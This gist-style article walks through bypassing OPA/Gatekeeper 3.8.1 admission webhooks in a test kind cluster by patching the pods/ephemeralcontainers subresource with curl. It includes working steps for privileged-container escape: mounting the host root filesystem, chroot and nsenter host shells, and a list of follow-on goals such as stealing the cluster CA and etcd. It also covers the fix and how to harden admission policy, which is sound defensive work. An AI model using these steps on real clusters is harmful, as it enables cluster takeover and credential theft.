
@skraga
Created August 21, 2023 22:55

How to mess with admission webhooks and have a giant security hole

Intro

Pod Security Policies were deprecated in Kubernetes 1.21 and removed in 1.25. See https://kubernetes.io/blog/2021/04/06/podsecuritypolicy-deprecation-past-present-and-future/. The suggested replacement, Pod Security Standards, doesn't provide the granularity we had with Pod Security Policies. For example, if you need to grant a single extra capability that is not allowed in the baseline profile, you have to switch the entire profile to privileged, which grants almost everything and is a major security risk.
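For reference, Pod Security Standards are enforced per namespace via labels (the namespace name below is just an example). This also illustrates the granularity problem: the profile applies to the whole namespace, with no way to carve out a single extra capability.

```shell
# Enforce the "baseline" profile on a namespace; to allow one extra
# capability you would have to jump all the way to "privileged" --
# there is no intermediate level.
kubectl label namespace restricted-apps \
  pod-security.kubernetes.io/enforce=baseline \
  pod-security.kubernetes.io/warn=restricted
```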

The suggested alternative is to deploy an external admission controller (OPA/Gatekeeper, Kyverno, Kubewarden, etc.) and do more granular validation. But there are possible caveats and security risks there as well. The purpose of this article is to show these risks, bring some attention to them, and suggest what we can do to avoid them.

Prerequisites

# Deploy kind cluster
kind create cluster --image kindest/node:v1.28.0

# Install OPA/Gatekeeper (specific version, and disable PSP as 1.25+ comes without PSP)
helm repo add gatekeeper https://open-policy-agent.github.io/gatekeeper/charts
helm install gatekeeper/gatekeeper --version "3.8.1" --name-template=gatekeeper --namespace gatekeeper-system --create-namespace --set psp.enabled=false

# Create namespace where restriction would be applied
kubectl create ns restricted

# Apply constraint template from OPA/Gatekeeper PSP library (controls privilege escalation)
curl -s https://raw.githubusercontent.com/open-policy-agent/gatekeeper-library/master/library/pod-security-policy/allow-privilege-escalation/template.yaml |\
tee /dev/tty |\
kubectl apply -f -

# Apply constraint only to our newly created namespace (restricted)
kubectl apply -f - <<EOF
# source: https://raw.githubusercontent.com/open-policy-agent/gatekeeper-library/master/library/pod-security-policy/allow-privilege-escalation/samples/psp-allow-privilege-escalation-container/constraint.yaml

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPAllowPrivilegeEscalationContainer
metadata:
  name: psp-allow-privilege-escalation-container
spec:
  match:
    kinds:
    - apiGroups: [""]
      kinds: ["Pod"]
    namespaceSelector:                           # <- ADDED
      matchLabels:                               # <- ADDED
        kubernetes.io/metadata.name: restricted  # <- ADDED
EOF

# perform some validation tests and make sure constraint is working
kubectl apply --dry-run=server -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: pod-ok
  namespace: restricted
spec:
  containers:
  - name: container
    image: nginx
    securityContext:
      privileged: false
      allowPrivilegeEscalation: false # set it because default value is true
---
apiVersion: v1
kind: Pod
metadata:
  name: pod-priv
  namespace: restricted
spec:
  containers:
  - name: container
    image: nginx
    securityContext:
      # we can't use privileged true w/o privilege escalation, will cause an error
      privileged: true
      allowPrivilegeEscalation: false
---
apiVersion: v1
kind: Pod
metadata:
  name: pod-fail
  namespace: restricted
spec:
  containers:
  - name: privileged-container
    image: nginx
    securityContext:
      privileged: true
  initContainers:
  - name: privileged-init-container
    image: nginx
    securityContext:
      privileged: true
EOF

So far so good. As you can see from our tests, we seem to be on the safe side and our rules are enforced.

pod/pod-ok created (server dry run)

Error from server (Invalid): error when creating "STDIN": Pod "pod-priv" is invalid: spec.containers[0].securityContext: Invalid value: core.SecurityContext{Capabilities:(*core.Capabilities)(nil), Privileged:(*bool)(0xc0072bf5ca), SELinuxOptions:(*core.SELinuxOptions)(nil), WindowsOptions:(*core.WindowsSecurityContextOptions)(nil), RunAsUser:(*int64)(nil), RunAsGroup:(*int64)(nil), RunAsNonRoot:(*bool)(nil), ReadOnlyRootFilesystem:(*bool)(nil), AllowPrivilegeEscalation:(*bool)(0xc0072bf5c9), ProcMount:(*core.ProcMountType)(nil), SeccompProfile:(*core.SeccompProfile)(nil)}: cannot set `allowPrivilegeEscalation` to false and `privileged` to true

Error from server (Forbidden): error when creating "STDIN": admission webhook "validation.gatekeeper.sh" denied the request: [psp-allow-privilege-escalation-container] Privilege escalation container is not allowed: privileged-container
[psp-allow-privilege-escalation-container] Privilege escalation container is not allowed: privileged-init-container

Investigating validation for ephemeralContainers

Let's see if it is possible to somehow deploy a privileged container and bypass the admission webhook. For that, we'll deploy a base pod and experiment with it.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: base
  namespace: restricted
spec:
  containers:
  - name: nginx
    image: nginx
    securityContext:
      # set field explicitly to false and for simplicity we don't 
      # need any mutations to make it false during creation
      allowPrivilegeEscalation: false 
EOF

We already checked that regular and init containers are guarded by OPA/Gatekeeper. Let's try the same with ephemeral containers.

First, we can try the naive approach and simply edit the pod to add a basic ephemeral container with kubectl edit pod base. We'll get the following error saying that the Pod object is mostly immutable:

# pods "base" was not valid:
# * spec: Forbidden: pod updates may not change fields other than `spec.containers[*].image`,`spec.initContainers[*].image`,`spec.activeDeadlineSeconds`,`spec.tolerations` (only additions to existing tolerations),`spec.terminationGracePeriodSeconds` (allow it to be set to 1 if it was previously negative)

Second, we can try the kubectl patch command and apply a patch like this:

kubectl patch pod base -n restricted -v=7 -p '{"spec": {"ephemeralContainers": [{"image": "busybox","name": "escape","securityContext": {"privileged": true}}]}}'

and again receive an error:

I0821 23:54:28.675988   20380 round_trippers.go:463] GET https://127.0.0.1:42959/api/v1/namespaces/restricted/pods/base
I0821 23:54:28.676097   20380 round_trippers.go:469] Request Headers:
I0821 23:54:28.676114   20380 round_trippers.go:473]     Accept: application/json
I0821 23:54:28.676251   20380 round_trippers.go:473]     User-Agent: kubectl/v1.27.2 (linux/amd64) kubernetes/7f6f68f
I0821 23:54:28.692883   20380 round_trippers.go:574] Response Status: 200 OK in 16 milliseconds
I0821 23:54:28.693657   20380 round_trippers.go:463] PATCH https://127.0.0.1:42959/api/v1/namespaces/restricted/pods/base?fieldManager=kubectl-patch
I0821 23:54:28.693705   20380 round_trippers.go:469] Request Headers:
I0821 23:54:28.693752   20380 round_trippers.go:473]     User-Agent: kubectl/v1.27.2 (linux/amd64) kubernetes/7f6f68f
I0821 23:54:28.693794   20380 round_trippers.go:473]     Content-Type: application/strategic-merge-patch+json
I0821 23:54:28.693835   20380 round_trippers.go:473]     Accept: application/json
I0821 23:54:28.708534   20380 round_trippers.go:574] Response Status: 422 Unprocessable Entity in 14 milliseconds
The Pod "base" is invalid: spec: Forbidden: pod updates may not change fields other than `spec.containers[*].image`,`spec.initContainers[*].image`,`spec.activeDeadlineSeconds`,`spec.tolerations` (only additions to existing tolerations),`spec.terminationGracePeriodSeconds` (allow it to be set to 1 if it was previously negative)

Third, we know that we can use the kubectl debug command and it should work for this purpose. If you run it with the --help flag you'll see that you can add an ephemeral container, but only with one of several debugging profiles:

Debugging profile. Options are "legacy", "general", "baseline", "netadmin", or "restricted"

If you check them with extra kubectl verbosity you'll see the settings for each profile and find almost nothing interesting there. Let's take a closer look at what kind of API calls kubectl debug makes.

kubectl debug base --image=busybox -n restricted -v=7 --profile=baseline
...
I0821 23:56:55.472632   20940 debug.go:460] generated strategic merge patch for debug container: {"spec":{"ephemeralContainers":[{"image":"busybox","name":"debugger-vtsjn","resources":{},"terminationMessagePolicy":"File"}]}}
I0821 23:56:55.472771   20940 round_trippers.go:463] PATCH https://127.0.0.1:42959/api/v1/namespaces/restricted/pods/base/ephemeralcontainers
I0821 23:56:55.472845   20940 round_trippers.go:469] Request Headers:
I0821 23:56:55.472915   20940 round_trippers.go:473]     Accept: application/json, */*
I0821 23:56:55.472972   20940 round_trippers.go:473]     Content-Type: application/strategic-merge-patch+json
I0821 23:56:55.473017   20940 round_trippers.go:473]     User-Agent: kubectl/v1.27.2 (linux/amd64) kubernetes/7f6f68f
I0821 23:56:55.485007   20940 round_trippers.go:574] Response Status: 200 OK in 11 milliseconds

As you can see from the output above, kubectl debug does the same PATCH operation and it works, while kubectl patch doesn't. The answer is that debug uses a slightly different endpoint (/ephemeralcontainers at the end of the HTTP path).

A different endpoint is used because the call is made to the pods/ephemeralcontainers subresource instead of pods. That's the key to why we can add ephemeral containers to our pod in this case.
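You can hit the same subresource endpoint directly to see it for yourself (a quick check, assuming kubectl is still pointed at the test cluster):

```shell
# Read the pod through the ephemeralcontainers subresource; the response
# is the full Pod object, but it is served from a different URL path than
# the plain pods resource -- and that path has its own webhook matching.
kubectl get --raw /api/v1/namespaces/restricted/pods/base/ephemeralcontainers
```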

Taking all this information into account, we can craft our own API request with curl and do whatever we want (e.g. add a privileged ephemeral container).

# use kubectl proxy command for convenient access to Kubernetes API (it will be available on 127.0.0.1:8001)
kubectl proxy&  # OR run just 'kubectl proxy' (requires separate terminal and proper kubeconfig) 

# create patch with privileged ephemeral container
payload=$(cat << END
{
    "spec": {
        "ephemeralContainers": [
            {
                "image": "ubuntu",
                "name": "escape",
                "command": [
                  "sleep",
                  "infinity"
                ],
                "securityContext": {
                  "privileged": true
                }
            }
        ]
    }
}
END
)

# apply request to API
curl -v -XPATCH  \
-H "Accept: application/json, */*" \
-H "Content-Type: application/strategic-merge-patch+json" \
-H "User-Agent: kubectl/v1.27.2 (darwin/amd64) kubernetes/7f6f68f" \
--data-binary "$payload" \
'http://127.0.0.1:8001/api/v1/namespaces/restricted/pods/base/ephemeralcontainers'

Validate

kubectl get po -o yaml -n restricted base | yq .spec.ephemeralContainers

- command:
  - sleep
  - infinity
  image: ubuntu
  imagePullPolicy: Always
  name: escape
  resources: {}
  securityContext:
    privileged: true
  terminationMessagePath: /dev/termination-log
  terminationMessagePolicy: File

But STOP, we have OPA/Gatekeeper deployed and such a request is EXPECTED to be blocked (same as for containers and init containers). And NO, it is not.

Let's take a look at the validating webhook configuration (it defines what gets sent to the webhook):

# kubectl get validatingwebhookconfigurations.admissionregistration.k8s.io gatekeeper-validating-webhook-configuration -o yaml

kind: ValidatingWebhookConfiguration
metadata:
  annotations:
    meta.helm.sh/release-name: gatekeeper
    meta.helm.sh/release-namespace: gatekeeper-system
  creationTimestamp: "2023-08-21T20:43:11Z"
  generation: 2
  labels:
    app: gatekeeper
    app.kubernetes.io/managed-by: Helm
    chart: gatekeeper
    gatekeeper.sh/system: "yes"
    heritage: Helm
    release: gatekeeper
  name: gatekeeper-validating-webhook-configuration
  resourceVersion: "709"
  uid: 586b128d-d6e3-448e-a34d-bca2fc311fbc
webhooks:
- admissionReviewVersions:
  - v1
  - v1beta1
  clientConfig:
    caBundle: <REDACTED>
    service:
      name: gatekeeper-webhook-service
      namespace: gatekeeper-system
      path: /v1/admit
      port: 443
  failurePolicy: Ignore
  matchPolicy: Exact
  name: validation.gatekeeper.sh
  namespaceSelector:
    matchExpressions:
    - key: admission.gatekeeper.sh/ignore
      operator: DoesNotExist
  objectSelector: {}
  rules:
  - apiGroups:
    - '*'
    apiVersions:
    - '*'
    operations:
    - CREATE
    - UPDATE
    resources:
    - '*'
    scope: '*'
  sideEffects: None
  timeoutSeconds: 3
...

You might think "Ah OK, we just need to add the PATCH operation to the configuration to resolve this", but we can't, because it is not supported and we'll get the following error:

# validatingwebhookconfigurations.admissionregistration.k8s.io "gatekeeper-validating-webhook-configuration" was not valid:
# * webhooks[0].rules[0].operations[2]: Unsupported value: "PATCH": supported values: "*", "CONNECT", "CREATE", "DELETE", "UPDATE"

The asterisk (*) in this error means all of the listed operations. PATCH is not supported by Kubernetes ValidatingWebhookConfiguration (a PATCH request reaches the webhook as an UPDATE admission operation anyway). But the real problem here is not patching; the real problem is Kubernetes subresources. Some objects have subresources, and these subresources require additional care. RBAC is easier in this regard because it is 'default deny'; with webhooks we need to explicitly define what should be sent to the webhook for additional validation (quite the opposite of RBAC, right?).
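For comparison, here is how the same subresource shows up on the RBAC side (a sketch; the role name is made up). Granting patch on pods alone does NOT grant patch on pods/ephemeralcontainers; each subresource must be named explicitly, which is exactly the 'default deny' behavior webhooks lack:

```shell
kubectl apply -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: debug-ephemeral   # hypothetical role name
  namespace: restricted
rules:
- apiGroups: [""]
  # the subresource must be listed explicitly; "pods" alone is not enough
  resources: ["pods/ephemeralcontainers"]
  verbs: ["get", "patch", "update"]
EOF
```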

If interested, you can obtain all subresources from your cluster and available verbs for each of them with the next simple script:

#!/bin/bash
# run `kubectl proxy` command first

SERVER="localhost:8001"
APIS=$(curl -s $SERVER/apis | jq -r '[.groups | .[].name] | join(" ")')

# do core resources first, which are at a separate api location
api="core"
curl -s $SERVER/api/v1 | jq -r --arg api "$api" '.resources | .[] | "\($api) \(.name): \(.verbs | join(" "))"'

# now do non-core resources
for api in $APIS; do
    version=$(curl -s $SERVER/apis/$api | jq -r '.preferredVersion.version')
    curl -s $SERVER/apis/$api/$version | jq -r --arg api "$api" '.resources | .[]? | "\($api) \(.name): \(.verbs | join(" "))"'
done

On our test cluster for pods it would be:

core pods: create delete deletecollection get list patch update watch
core pods/attach: create get
core pods/binding: create
core pods/ephemeralcontainers: get patch update
core pods/eviction: create
core pods/exec: create get
core pods/log: get
core pods/portforward: create get
core pods/proxy: create delete get patch update
core pods/status: get patch update

Attack vectors

First of all, without additional custom controls, you can bypass the scheduler (node selector, affinity, tolerations) and schedule your pod wherever you want, including control plane nodes. (This is not the case for AWS EKS, where the control plane runs separately.)

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: base
  namespace: restricted
spec:
  nodeName: <node_name>   # <- add here
  containers:
  - name: nginx
    image: nginx
    securityContext:
      # set field explicitly to false and for simplicity we don't 
      # need any mutations to make it false during creation
      allowPrivilegeEscalation: false 
EOF

When you set nodeName you're doing the scheduler's job: the scheduler normally reads the configuration in the manifest, performs filtering and scoring, and at the end saves the chosen nodeName into the pod object. Setting nodeName directly skips all of that.
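In fact, the scheduler's final step goes through yet another subresource from the list above, pods/binding. A sketch of doing that step by hand (it assumes kubectl proxy is still running, the node name is an example, and the target pod is not yet scheduled):

```shell
# POST a Binding object to the pods/binding subresource -- this is what
# kube-scheduler does after filtering and scoring. It only succeeds for
# a pod that has no node assigned yet.
curl -s -XPOST \
  -H "Content-Type: application/json" \
  --data-binary '{
    "apiVersion": "v1",
    "kind": "Binding",
    "metadata": { "name": "base" },
    "target": { "apiVersion": "v1", "kind": "Node", "name": "kind-control-plane" }
  }' \
  'http://127.0.0.1:8001/api/v1/namespaces/restricted/pods/base/binding'
```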

Having a container in privileged mode is a huge security risk and should never be possible (except for system components that are under your control). Let me show one possible attack vector: mounting the host root (/) filesystem read-write. This was done on Rocky Linux 8 (a RHEL-based distro).

kubectl exec -it -n restricted base -c escape -- bash

root@base:/# # check root UUID
root@base:/# cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-4.18.0-477.15.1.el8_8.aarch64 root=UUID=83bb5b52-0ae0-43a3-897b-befd7ef3aad0 ro console=tty1 console=ttyS0,115200n8 earlyprintk=ttyS0,115200 rootdelay=300 net.ifnames=0 scsi_mod.use_blk_mq=y crashkernel=512M-1G:160M,1G-2G:448M,2G-:512M
root@base:/#
root@base:/# findfs UUID=83bb5b52-0ae0-43a3-897b-befd7ef3aad0
/dev/nvme0n1p2
root@base:/#
root@base:/# mkdir /mnt/root
root@base:/# mount /dev/nvme0n1p2 /mnt/root

When you have the host root filesystem mounted with write permissions you can:

  • add a new user and SSH key, edit sudo rights
  • use the container runtime socket and run whatever container you want (e.g. with hostPID, and then use more convenient tooling like nsenter to do namespace manipulations and obtain a host shell)
  • control plane: manipulate static pods and API server flags, decrease the security level, obtain a host shell, etc.
  • control plane: steal the Kubernetes CA certificates and generate a 'golden' user keypair that stays valid as long as the CA does
  • control plane: steal the etcd database and encryption keys (if encryption at rest is enabled)
  • intercept traffic, do whatever you want, etc.
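To make the first two items concrete: once the host root filesystem is mounted (as shown above), getting a host-level shell is a one-liner (a sketch, building on the /mnt/root mount from the previous step):

```shell
# Inside the privileged "escape" container, after mounting /dev/nvme0n1p2:
chroot /mnt/root /bin/bash   # shell rooted in the host filesystem

# If the container also shared the host PID namespace (ours does not, so
# this is a sketch of the alternative path), nsenter would give a full
# host shell by entering the namespaces of the host's PID 1:
# nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
```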

Conclusion

All of the consequences above are possible ONLY if you don't pay enough attention to detail. I haven't checked other tools (Kyverno, etc.), but as for Gatekeeper, this was fixed in version 3.9.0+, and the updated Gatekeeper webhook configuration looks like this:

  - apiGroups:
    - '*'
    apiVersions:
    - '*'
    operations:
    - CREATE
    - UPDATE
    {{- if .Values.enableDeleteOperations }}
    - DELETE
    {{- end }}
    resources:
    - '*'
    # Explicitly list all known subresources except "status" (to avoid destabilizing the cluster and increasing load on gatekeeper).
    # You can find a rough list of subresources by doing a case-sensitive search in the Kubernetes codebase for 'Subresource("'
    - 'pods/ephemeralcontainers'
    - 'pods/exec'
    - 'pods/log'
    - 'pods/eviction'
    - 'pods/portforward'
    - 'pods/proxy'
    - 'pods/attach'
    - 'pods/binding'
    - 'deployments/scale'
    - 'replicasets/scale'
    - 'statefulsets/scale'
    - 'replicationcontrollers/scale'
    - 'services/proxy'
    - 'nodes/proxy'
    # For constraints that mitigate CVE-2020-8554
    - 'services/status'

With newer Gatekeeper you won't be able to run a privileged ephemeral container, because this specific endpoint is covered.

When you decide to use 3rd party tooling to perform validation (it seems you're forced to after the PSP deprecation), or write your own, you need to carefully check its configuration (e.g. subresources); otherwise there is a risk of compromising the entire cluster.

PS: Starting from Kubernetes 1.28, Validating Admission Policy has graduated to beta. Kubernetes blog post on this: https://kubernetes.io/blog/2023/03/30/kubescape-validating-admission-policy-library/. It is an additional security mechanism that could be used. It only handles relatively simple rules, but compared to 3rd party webhooks it is much faster, since policies are evaluated in-process by the API server. To try it you need to:

  • Have Kubernetes 1.28 or later
  • Ensure the ValidatingAdmissionPolicy feature gate is enabled.
  • Ensure that the admissionregistration.k8s.io/v1beta1 API is enabled
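As a taste of what that looks like, here is a sketch of a ValidatingAdmissionPolicy that would reject privileged containers, including ephemeral ones, in our restricted namespace. The field names follow the v1beta1 API, but treat the policy names and the exact CEL expressions as illustrative rather than production-ready:

```shell
kubectl apply -f - <<EOF
apiVersion: admissionregistration.k8s.io/v1beta1
kind: ValidatingAdmissionPolicy
metadata:
  name: deny-privileged   # hypothetical name
spec:
  failurePolicy: Fail
  matchConstraints:
    resourceRules:
    - apiGroups: [""]
      apiVersions: ["v1"]
      operations: ["CREATE", "UPDATE"]
      # the lesson from this article: list the subresource too
      resources: ["pods", "pods/ephemeralcontainers"]
  validations:
  - expression: >-
      !object.spec.containers.exists(c,
        has(c.securityContext) && has(c.securityContext.privileged) &&
        c.securityContext.privileged)
    message: "privileged containers are not allowed"
  - expression: >-
      !has(object.spec.ephemeralContainers) ||
      !object.spec.ephemeralContainers.exists(c,
        has(c.securityContext) && has(c.securityContext.privileged) &&
        c.securityContext.privileged)
    message: "privileged ephemeral containers are not allowed"
---
apiVersion: admissionregistration.k8s.io/v1beta1
kind: ValidatingAdmissionPolicyBinding
metadata:
  name: deny-privileged-binding   # hypothetical name
spec:
  policyName: deny-privileged
  validationActions: ["Deny"]
  matchResources:
    namespaceSelector:
      matchLabels:
        kubernetes.io/metadata.name: restricted
EOF
```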